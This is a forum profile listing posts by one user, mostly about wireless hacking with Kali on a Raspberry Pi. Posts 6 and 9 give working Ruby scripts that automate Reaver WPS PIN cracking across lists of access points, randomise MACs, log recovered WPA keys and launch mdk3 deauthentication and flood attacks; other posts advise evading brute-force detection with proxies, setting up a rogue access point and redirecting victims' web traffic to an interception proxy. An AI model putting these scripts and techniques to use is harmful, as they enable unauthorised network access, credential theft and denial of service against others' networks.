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Everything posted by i8igmac

  1. I would like to sort through a list of CAP files and extract only the data needed for cracking... these files can become very large in size, just looking for a way to process and save hard drive space... command line examples!
  2. Http://images.offensive-security.com/1.0.9/kali-1.0.9-rpi.img.xz xz -d kali-1.0.9-rpi.img.xz have you download this file up here? works out of the box...
  3. Cooper. how close are you to assembling a proof of concept?
  4. Very cool. I'm currently working on some drop box type stuff. I don't own a pineapple... Raspberry pi b+ with kali installed on 30gig sd card. 15000 battery running 2 alfa cards I can get 12 hours. Running the pi alone I can get maybe 30 hours
  5. I am also curious in a explanation on 'whats behind the hash' Computers solving the hash, what is this hash, a password? Hundreds of millions of machines working together to crack a hash?
  6. So, i have decided to share one of my projects, i figure i wont get much attention with this script, witch is why im sharing... i made a video i hope is quick to the point and informative... please share your comments... if there are any interested i may add some more functions to this script like capturing handshakes for cracking later... all you need is a linux machine, a wireless adapter (the more the better)... ruby and a ruby requirement open3... updated code... require 'open3' #on reboot stuff. device="" channel="" ap_mac="" essid="" @device_list=["wlan1"] @check=[] #sleep 30 #sleep if you plan to start this script from startup.rc... give drives a chance to load #`ifconfig wlan0 down` #`iwconfig wlan0 mode monitor` #`ifconfig wlan0 up` `ifconfig wlan1 down` `iwconfig wlan1 mode monitor` `ifconfig wlan1 up` #will not launch until the While true: at bottem #reaver attack and log def reaver(device, channel, ap_mac) Thread.start{ #`ifconfig #{device} down` #`iwconfig #{device} mode monitor` #`ifconfig #{device} up` #puts "Random mac..." Open3.popen3("iwconfig #{device} channel #{channel}") puts "change #{channel}" Open3.popen3("ifconfig #{device} down") puts "down" #Open3.popen3("macchanger #{device} -r") puts "changemac" Open3.popen3("ifconfig #{device} up") puts "up" puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}" Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}"){|i,o,t,p| i.puts("y") #tell reaver Yes to continue where the attack left off while line=o.gets if select([o],nil,nil,15) puts "#{device} #{ap_mac}: #{line}" log_all=File.open("log_all_#{ap_mac}",'a') log_all.puts("#{device} #{ap_mac}: #{line}") log_all.close #100.00% complete #Pin cracked in #WPS PIN: '12345678' #WPA PSK: 'asshole' #AP SSID: 'noob' # Log success to another file if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:") success=File.open("sucess_#{ap_mac}",'a') success.puts("#{device} #{ap_mac}: #{line}") success.close end if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row") puts "#{device} #{ap_mac}: killing thread" @check.delete(device)#remove the card from the list... can now be used in a new process Process.kill("KILL",p.pid) end else puts "#{device} #{ap_mac}: TIMEOUT" @check.delete(device) Process.kill("KILL",p.pid) break end end @check.delete(device) Process.kill("KILL",p.pid) } @check.delete(device) Process.kill("KILL",p.pid) } #thread.start end #will not launch until the While true: at bottem def mdk3(device, channel, ap_mac, essid) Open3.popen3("iwconfig #{device} channel #{channel}") Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } end #44:94:FC:3B:E9:16 7 ANDY DALTON SOUR HOUR #28:C6:8E:A3:10:7A 11 NETGEAR01 #the main reason for this script # if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart #just added a few extra dos attacks #reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6 #reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8 def gather() scan_complete=false while scan_complete==false @device_list.each{|wlan| if not @check.include?(wlan) puts "#{wlan} scanning with wash" buff="" Open3.popen3("wash -i #{wlan} -C"){|i,o,t,p| Thread.start{sleep 25; Process.kill("KILL",p.pid)}; while line=o.gets; if not line.nil?; buff<<line; end; end} @list=[] buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line{|x| if x.include?("No"); @list<<"#{x.split[1]} #{x.split[0]}"; end; } puts @list scan_complete=true break else puts "waiting for device to free up... redo" sleep 3 next end } end end try_again=false while true gather() @list.each{|stack| #puts "trying #{stack}" sleep 1 @device_list.each{|wlan| if not @check.include?(wlan) puts @check @check<<wlan #reaver("wlan2", "6", "20:76:00:1C:D9:C8") reaver("#{wlan.chomp}","#{stack.split[0]}", "#{stack.split[1]}") try_again=false break else try_again=true end } if try_again==true redo end } end
  7. http://www.fit-pc.com/web/products/mintbox-mini/ Have u seen the mintbox mini? Seems like huge performance in a small package... The MintBox Mini is powered by an AMD A4 6400T and a Radeon R3 GPU and equipped with 4GB RAM and 64GB SSD cooper, any ideas for finding identical performance or close to, at a low cost?
  8. save script as reaver.rb Ruby reaver.rb Edit: My reaver dropbox has been running for about 12 hours now. With 2 alfa card ;-)
  9. require 'open3' #on reboot stuff. device="wlan2" channel="8" ap_mac="4C:60:DE:31:C3:79" essid="NETGEAR34" `ifconfig #{device} down` `iwconfig #{device} mode monitor` `ifconfig #{device} up` #will not launch until the While true: at bottem #reaver attack and log def reaver(device, channel, ap_mac) Thread.start{ puts "Random mac..." Open3.popen3("ifconfig #{device} down") Open3.popen3("macchanger #{device} -r") Open3.popen3("ifconfig #{device} up") Open3.popen3("reaver -i #{device} -vv --dh-small -b #{ap_mac} -c #{channel}"){|i,o,t| i.puts("y") #tell reaver Yes to continue where the attack left off while line=o.gets #Log all reaver output to a file puts line log_all=File.open("log_all_#{ap_mac}",'a') log_all.puts(line) log_all.close #100.00% complete #Pin cracked in #WPS PIN: '12345678' #WPA PSK: 'asshole' #AP SSID: 'noob' # Log success to another file if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:") success=File.open("sucess_#{ap_mac}",'a') success.puts(line) success.close end end } } #thread.start end #will not launch until the While true: at bottem def mdk3(device, channel, ap_mac, essid) Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } end #the main reason for this script # if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart #just added a few extra dos attacks #reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6 #reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8 while true #reaver(device, channel, ap_mac) reaver("wlan2", "6", "20:76:00:1C:D9:C8") reaver("wlan0", "8", "4C:60:DE:31:C3:79") #run for 10 minutes, then restart sleep 10*60 `killall reaver` #mdk3(device, channel, ap_mac, essid) mdk3("wlan2", "6", "20:76:00:1C:D9:C8", "myqwest4681") mdk3("wlan0", "8", "4C:60:DE:31:C3:79", "NETGEAR34") sleep 2*60 `killall mdk3` end So, its something i made real quick... i tried to keep it simple... you have to modify the while true: loop to work for you... if you set the options at the top, then you simply need to use this. reaver(device, channel, ap_mac) exactly as shown inside the while true loop. then it will run reaver for 10*60 seconds (ten minutes) then it will kill reaver and launch some mdk3 attacks for 2 minutes a new mac is generated before each reaver thread starts. i could add a if "rate detected" then trigger the mdk3 attack. g2g
  10. Its all depending on the configuration. Each machine may have custom modules or brute force prevention software installed... If you send off 5 failed attempts to quickly, even tho your 6th attempt is valid login credentials, brute force detection kicks in and responds with unauthorized... If you can find the variable of how many attempts trigger the red flag, then slow down the attack by a few seconds for each attempt. You may find the sweet spot so, now you found your attack speed is slow as hell, 1 password per 3 minutes will safely evade any red flags (example) How many proxy's will it take to achieve 1pass per second ?
  11. there are all kinds of scripts all over pastebin. today I have just assembled a reaver Dropbox. Anker 15000mah awus036h Awus036nha Usb powered hub And raspberry pi b+ kali installed. I have wrote 2 scripts. one will simply log how long the battery will last. and then I have made a script that performs some Reaver attacks on a large list of MAC addresses. reaver wlan0 mac-from-list reaver wlan1 mac-from-list 2 access points will be attacked for 5 minutes at a time. then will move onto the next 2 mac addresses in the list with a newly generated mac address. I like to call this a shotgun blast... ill have to share the script another time. I could set you up with a barebones example script... ruby for the win!
  12. impressed in so many ways lol... I made it the first, "nothing you say to the cops will help u in court" "It can only help them convict you" And plenty of examples to back up his theory
  13. Its been A decade since I used windows as my daily operating system but I never ran into milware/viri I couldn't remove... antivirus software is crap from my experience... You should watch netstat -nb when installing newsoftware
  14. don't use the Administrator user... create a user account with less privileges, use this new account... If you can't remove a infection then just delete the account and create a new one. My dad brings me his computer saying its infected... its a quick fix
  15. i have found a nice little tutorial on building parabola's. http://www.instructables.com/id/Parabola-Plotting-Web-Pages/?ALLSTEPS if everything is printed out properly, you could construct a clean and precise parabola... So, with the use of this little bit of java script http://www.idea2ic.com/OtherStuff/Web_parabola/Plot%20A%20Parabola%20segment.html you can print out 12 segments tape together a clean prototype... But when i look at the Left side or Right side im Not sure where the focal point is located... Maybe some one could look at this little script and find a way to place a X at the focal point location?
  16. could you try arpspoof ? Or maybe knowing a clients ipaddress could you arpspoof I would also check other options ettercap offers with -M
  17. Im going to bring this thread back as i now have another problem... i want 2 devices to work with dnsmasq to provide dhcp service's I currently have my raspberry pi associated with a access point using wlan0... i then have a alfa-r36 wireless router plugged into the pi's eth0 port to act as a hotspot... The script above makes this a working repeater setup (i get awesome speeds with both IN and OUT devices using wireless N) The alfa-r36 is getting serviced dhcp request from the pi... But now i would like to plug into the pi another alfa card for playing around... My first test is as follows airbase-ng wlan2 -P -C 60 -c 4 (created a new tap device at0.. karma like access point) ifconfig at0 up iptables --append FORWARD --in-interface at0 -j ACCEPT So. at this point my new access point wont provide ip address's to my clients... iptables is a bit confusing and maybe this is the problem? EDIT.. i have fixed it... the iptables worked above but with a small adjustment to dnsmasq.conf interface=eth0 dhcp-range=,,12h interface=at0 dhcp-range=,,12h
  18. http://www.amazon.com/gp/aw/d/B000OS8XN4/ref=mp_s_a_1_1?qid=1421078496&sr=8-1π=AC_SX110_SY165_QL70 this may be my next purchase...
  19. http://www.amazon.com/gp/aw/d/B0054MLMLA/ref=mp_s_a_1_2?qid=1421072298&sr=8-2&dpPl=1&dpID=41GhnJqtXbL&ref=plSrchπ=AC_SY200_QL40 don't buy spent 26$ bolo brand yagi 18dbi... worked as well as a 5 dbi dipole The thing was quarter of a inch out of alignment Shipping back to amazon the next few days
  20. the prices change constantly... I would not get the best... nvidia sli 4way... I have always wanted to build one of these... maybe you can find some nvidia cards that fit your price range to fill 4slots... If your going to follow threw with this... how much cash do you have to spend?
  21. if I was a witness to this kind of activity, fake or real... I would most definitly become appart of the situation and beat some one close to death... I have kids and seen to many movies...
  22. All device's and applications will act different when burp request a certificate... The most popular applications may not work do to security reasons.
  23. iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 80 -j DNAT --to-destination kali-ip:3128 ptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 443 -j DNAT --to-destination kali-ip:3128 have fun
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